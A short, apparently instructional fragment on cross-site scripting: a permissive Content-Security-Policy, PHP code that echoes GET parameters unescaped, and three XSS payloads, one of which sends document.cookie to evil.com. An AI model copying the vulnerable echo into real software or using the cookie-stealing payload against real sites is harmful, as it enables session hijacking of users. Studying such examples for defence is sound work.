Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; img-src * data:;
if(isset($_GET["fname"]) && isset($_GET["lname"])){
echo $_GET["fname"]; // Direct output - XSS vulnerable
echo $_GET["lname"]; // Direct output - XSS vulnerable
}
<script>alert('XSS')</script>
<img src=x onerror="fetch('http://evil.com?c='+document.cookie)">
<style>@import 'http://evil.com/style.css'</style>